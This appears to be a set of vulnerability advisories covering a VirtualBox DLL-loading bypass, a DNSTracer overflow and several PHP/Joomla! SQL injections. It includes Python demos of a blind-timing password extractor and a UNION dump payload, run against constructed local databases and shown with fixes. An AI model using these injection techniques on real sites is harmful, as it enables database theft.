VirtualBox: Windows Process DLL Signature Bypass EoP

The process hardening implemented by the VirtualBox driver can be circumvented to load arbitrary code inside a VirtualBox process, giving access to the VBoxDrv driver, which can allow routes to EoP from a normal user.

The ring 3 process hardening in VirtualBox adds three hooks to module loading to try and prevent untrusted code being loaded into the process: LdrLoadDll, NtCreateSection and an LDR DLL notification. Each will try to verify a DLL load and either reject the load with an error or kill the process if it is not possible to prevent the load from occurring. Looking at the hooks, there are a couple of issues which, when combined, allow a user to inject an arbitrary DLL into a protected process.

1. The location checks are not very rigorous. As far as I can tell, arbitrary files need to be owned by an admin/TrustedInstaller, but this check is waived if the file is in system32/WinSxS. However, this doesn't take into account that there are some directories which can be written to inside system32, such as Tasks.

2. The code to enforce specific certificates doesn't seem to be enabled, so at the very least, combined with 1, you can load any validly signed file.

It might be considered that 2 isn't an issue, as getting a signing cert could be a sufficient burden for a "malicious" attacker, so instead it's worth considering what else the weak path checking allows you to do. The handling of DLL paths has some interesting behaviours; most interestingly, if no file extension is present in the path then the loader will automatically append .DLL to it. This is imitated by the VirtualBox hooks, so if you pass a path without an extension then the hooks will also append .DLL to it. This means that if you can write a file to a directory which is in the system32 path, then you can bypass the hooks and load arbitrary code.
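As an added illustration (not VirtualBox's code and not from the original advisory), the Python below models the two behaviours described above: the owner check that is waived for anything under system32/WinSxS, and the automatic .DLL suffix for a path with no extension. The drive layout, the owner names and the list of user-writable directories (only Tasks, as named in the text) are assumptions made for the model; a stricter variant of the check is shown beside the weak one.

```python
import ntpath

# Constructed for the model: where the trusted directories live and which
# owners count as trusted. A real check resolves these at run time.
SYSTEM32 = r"c:\windows\system32"
WINSXS = r"c:\windows\winsxs"
TRUSTED_OWNERS = {r"BUILTIN\Administrators", r"NT SERVICE\TrustedInstaller"}
# Assumption: subdirectories of system32 a normal user can write into. The
# text names Tasks; others would be found by auditing the ACLs on the box.
USER_WRITABLE_DIRS = {ntpath.join(SYSTEM32, "tasks")}


def normalize_requested_path(path: str) -> str:
    """Mimic the loader behaviour the hooks imitate: a path with no
    extension gets ".DLL" appended before any check is made."""
    p = ntpath.normpath(path)
    _, ext = ntpath.splitext(p)
    if ext == "":
        p += ".DLL"
    return p.lower()


def under(p: str, directory: str) -> bool:
    """True if the normalised path p lies below directory."""
    return p.startswith(directory.lower() + "\\")


def weak_location_check(path: str, owner: str) -> bool:
    """The check as described: anything under system32/WinSxS is accepted
    without looking at the owner; elsewhere the owner must be trusted.
    A low-privilege user who can write to system32\\Tasks passes it."""
    p = normalize_requested_path(path)
    if under(p, SYSTEM32) or under(p, WINSXS):
        return True
    return owner in TRUSTED_OWNERS


def in_user_writable_dir(p: str) -> bool:
    """True if any ancestor directory of p is one a normal user can write to."""
    d = ntpath.dirname(p)
    while True:
        if d in USER_WRITABLE_DIRS:
            return True
        parent = ntpath.dirname(d)
        if parent == d:  # reached the drive root
            return False
        d = parent


def strict_location_check(path: str, owner: str) -> bool:
    """Stricter model: the owner requirement is never waived, and files in
    user-writable directories are refused even though they sit under system32."""
    p = normalize_requested_path(path)
    if owner not in TRUSTED_OWNERS:
        return False
    return not in_user_writable_dir(p)
```

Note that the extension-less path is what makes the write primitive useful: the attacker drops `evil.dll` into Tasks, asks for `...\Tasks\evil`, and both the loader and the hook resolve the same `evil.dll`, so the check and the load agree on the file while the location test still passes.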

DNSTracer 1.9 – Buffer Overflow

DNSTracer 1.9 is vulnerable to a stack-based buffer overflow caused by a missing bounds check when an overlong command-line argument is copied into a fixed-size stack buffer. An attacker who controls that argument can corrupt the saved return address and, with a suitable payload, redirect execution to code of their choosing in the context of the application; at minimum the program can be crashed.

Joomla! Component StreetGuessr Game v1.1.8 – SQL Injection

Joomla! Component StreetGuessr Game v1.1.8 contains a SQL injection vulnerability: input from an HTTP request parameter reaches a database query without sanitisation or parameter binding, so a specially crafted request can alter the query. Depending on the privileges of the database account, an attacker can read sensitive data, modify or delete rows and, where the DBMS exposes file-write or command-execution features, extend the compromise to the underlying server.

School Management System | EDUMOD Pro v1.3 – SQL Injection

EDUMOD Pro is a web-based school management system written in PHP with a MySQL back end. The injection point is the student search at http://localhost/students/search.php: an attacker sends malicious payloads in the POST body, and the injected SQL can be used to extract sensitive information from the database.

Premium Servers List Tracker v1.0 – SQL Injection

Premium phpServersList is a server management tool that lets users track their own servers and lets visitors find servers from around the world. The vulnerability is a time-based blind SQL injection in the numeric path segment of the server URI (sqlmap's URI parameter '#1*'): the request http://localhost/server/1 AND SLEEP(5) delays the response by five seconds, which gives the attacker a yes/no oracle for extracting data one comparison at a time.
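To show how the `/server/1 AND SLEEP(5)` probe becomes a data-extraction channel, here is an added example (not the phpServersList code). SQLite stands in for MySQL, with MySQL's `SLEEP()` emulated by a registered Python function; the table and column names, the secret and the `CASE WHEN` form of the condition are constructed for the demo (on MySQL the attacker would use `ORD`/`SUBSTRING` instead of SQLite's `unicode`/`substr`).

```python
import functools
import sqlite3
import time

DELAY = 0.15            # seconds the injected SLEEP() stalls the query
THRESHOLD = DELAY / 2   # an elapsed time above this means the condition held


def build_db() -> sqlite3.Connection:
    """Constructed stand-in for the application's MySQL database. SQLite has
    no SLEEP(), so MySQL's is emulated with a registered Python function."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("SLEEP", 1, lambda secs: time.sleep(secs) or 0)
    conn.executescript("""
        CREATE TABLE servers (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO servers VALUES (1, 'eu-west-1');
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'k9z');
    """)
    return conn


def vulnerable_server_lookup(conn, raw_id: str):
    """Models /server/<id>: the path segment is concatenated straight into SQL."""
    return conn.execute("SELECT name FROM servers WHERE id = " + raw_id).fetchall()


def fixed_server_lookup(conn, raw_id: str):
    """Fix: validate the type, then bind the value instead of concatenating."""
    try:
        server_id = int(raw_id)
    except ValueError:
        return []
    return conn.execute("SELECT name FROM servers WHERE id = ?", (server_id,)).fetchall()


def oracle(conn, condition: str) -> bool:
    """Ask a yes/no question; the only channel is whether the response stalled.
    CASE WHEN is used because it parses the same way in MySQL and SQLite."""
    payload = f"1 AND (CASE WHEN ({condition}) THEN SLEEP({DELAY}) ELSE 0 END)"
    start = time.monotonic()
    vulnerable_server_lookup(conn, payload)
    return time.monotonic() - start > THRESHOLD


def extract_password(conn, username: str, max_len: int = 16) -> str:
    """Recover a secret one character at a time with a binary search over the
    printable ASCII range (about seven timed requests per character)."""
    secret = f"(SELECT password FROM users WHERE username = '{username}')"
    recovered = ""
    for pos in range(1, max_len + 1):
        if not oracle(conn, f"length({secret}) >= {pos}"):
            break  # ran past the end of the secret
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(conn, f"unicode(substr({secret}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


@functools.lru_cache(maxsize=None)
def demo() -> dict:
    """Run the whole exchange once against the constructed database."""
    conn = build_db()
    return {
        "normal": vulnerable_server_lookup(conn, "1"),
        "true_condition_stalls": oracle(conn, "1 = 1"),
        "false_condition_is_fast": oracle(conn, "1 = 2"),
        "recovered_password": extract_password(conn, "admin"),
        "fixed_rejects_payload": fixed_server_lookup(conn, "1 AND SLEEP(5)"),
        "fixed_normal": fixed_server_lookup(conn, "1"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The threshold of half the injected delay is what makes the oracle robust to ordinary latency jitter; in practice an attacker calibrates it against a few baseline requests first. The fixed lookup shows why the flaw is cheap to close: once the segment is parsed as an integer and bound, `1 AND SLEEP(5)` is simply an invalid id.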

Joomla! Component Ultimate Property Listing v1.0.2 – SQL Injection

A SQL injection vulnerability exists in Joomla! Component Ultimate Property Listing v1.0.2, which allows an attacker to execute arbitrary SQL commands via the 'sf_selectuser_id', 'sf_multiplelocation1_id', and 'sf_multiplelisting' parameters in the 'index.php' script.

Joomla! Component Event Registration Pro Calendar v4.1.3 – SQL Injection

Joomla! Component Event Registration Pro Calendar v4.1.3 contains a SQL injection vulnerability that is triggered by a specially crafted HTTP request carrying SQL statements in a vulnerable parameter. An attacker can use it to read sensitive information from the database, modify data and, depending on the privileges of the database account, reach the underlying server.

Joomla! Component PHP-Bridge v1.2.3 – SQL Injection

Joomla! Component PHP-Bridge v1.2.3 contains a SQL injection vulnerability reachable with a specially crafted HTTP request. In the request, the 'option' and 'view' parameters route to the vulnerable component and view, and the 'id' parameter carries the injected SQL that the application executes.
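The Joomla! (StreetGuessr Game, Ultimate Property Listing, Event Registration Pro Calendar, PHP-Bridge) and EDUMOD Pro search.php entries above all describe the same in-band pattern: a request parameter spliced into query text. The example below is added here and is not code from any of those components; SQLite stands in for MySQL and the table names, column names and the admin row are constructed for the demo. It shows the vulnerable query, the quote probe an attacker uses to confirm injectability, a UNION payload that pulls rows from another table, and the parameterised form that closes the hole.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed stand-in for a component's MySQL database (SQLite here)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE students (id INTEGER PRIMARY KEY, name TEXT, grade TEXT);
        INSERT INTO students VALUES (1, 'Alice', 'A'), (2, 'Bob', 'B');
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
        INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return conn


def search_vulnerable(conn, term: str):
    """The pattern behind the advisories above: the request parameter is
    spliced into the query text, so a quote in `term` ends the string literal
    and everything after it is parsed as SQL."""
    sql = "SELECT name, grade FROM students WHERE name LIKE '%" + term + "%'"
    return conn.execute(sql).fetchall()


def search_fixed(conn, term: str):
    """Parameter binding keeps `term` data, never SQL. LIKE wildcards are
    escaped as well, so a user cannot turn the search into a full-table dump."""
    escaped = term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    return conn.execute(
        "SELECT name, grade FROM students WHERE name LIKE ? ESCAPE '\\'",
        ("%" + escaped + "%",),
    ).fetchall()


# Closes the LIKE literal, appends a UNION that pulls two columns from another
# table (the column count must match the original SELECT), and comments out
# the remainder of the original query.
UNION_PAYLOAD = "x%' UNION SELECT username, password_hash FROM users -- "


def is_injectable(conn, search_fn) -> bool:
    """Error-based probe: a lone quote that produces a SQL syntax error means
    the input reached the parser unescaped."""
    try:
        search_fn(conn, "'")
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    conn = build_db()
    print("probe on vulnerable handler:", is_injectable(conn, search_vulnerable))
    print("probe on fixed handler:", is_injectable(conn, search_fixed))
    print("UNION against vulnerable handler:", search_vulnerable(conn, UNION_PAYLOAD))
    print("UNION against fixed handler:", search_fixed(conn, UNION_PAYLOAD))
```

The UNION payload is the same shape whichever parameter is vulnerable ('id', 'sf_selectuser_id', a POST search field): the attacker only has to find the column count and a position that echoes data back. Escaping the LIKE metacharacters is a separate hardening step from binding; binding alone stops injection, but `%` on its own would still match every row.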
